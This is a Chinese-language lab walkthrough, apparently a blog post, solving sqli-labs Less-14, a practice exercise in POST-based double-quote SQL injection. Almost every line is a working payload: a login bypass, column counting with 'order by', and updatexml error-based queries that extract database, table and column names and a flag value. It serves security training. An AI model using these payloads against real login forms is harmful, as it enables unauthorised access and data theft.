Less-14

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

 1.判断是否存在注入

uname=1"&passwd=a&submit=Submit

错误回显 => 存在注入

2.判断参数类型

uname=1 or 1=1#&passwd=a&submit=Submit

无回显

uname=1" or 1=1#&passwd=a&submit=Submit

登录成功 =>字符型

3.进行参数闭合

uname=1" or 1=1#&passwd=a&submit=Submit

登录成功 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=1" order by 2#&passwd=a&submit=Submit

无回显

uname=1" order by 3#&passwd=a&submit=Submit

错误回显 => 有2列

5.进行报错注入，查看所在数据库

uname=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=a&submit=Submit

6.查看数据库的表

uname=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=a&submit=Submit

7.查看r1lPpzMz表中的列

uname=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="r1lPpzMz"),0x7e),1)#&passwd=a&submit=Submit

8.查看表中的flag列中的数据

uname=1" and updatexml(1,concat(0x7e,(select flag from r1lPpzMz limit 0,1),0x7e),1)#&passwd=a&submit=Submit

标签：14,Less,passwd,0x7e,#&,submit,uname,Submit
来源： https://www.cnblogs.com/WHOAMI-xiaoyu/p/16057671.html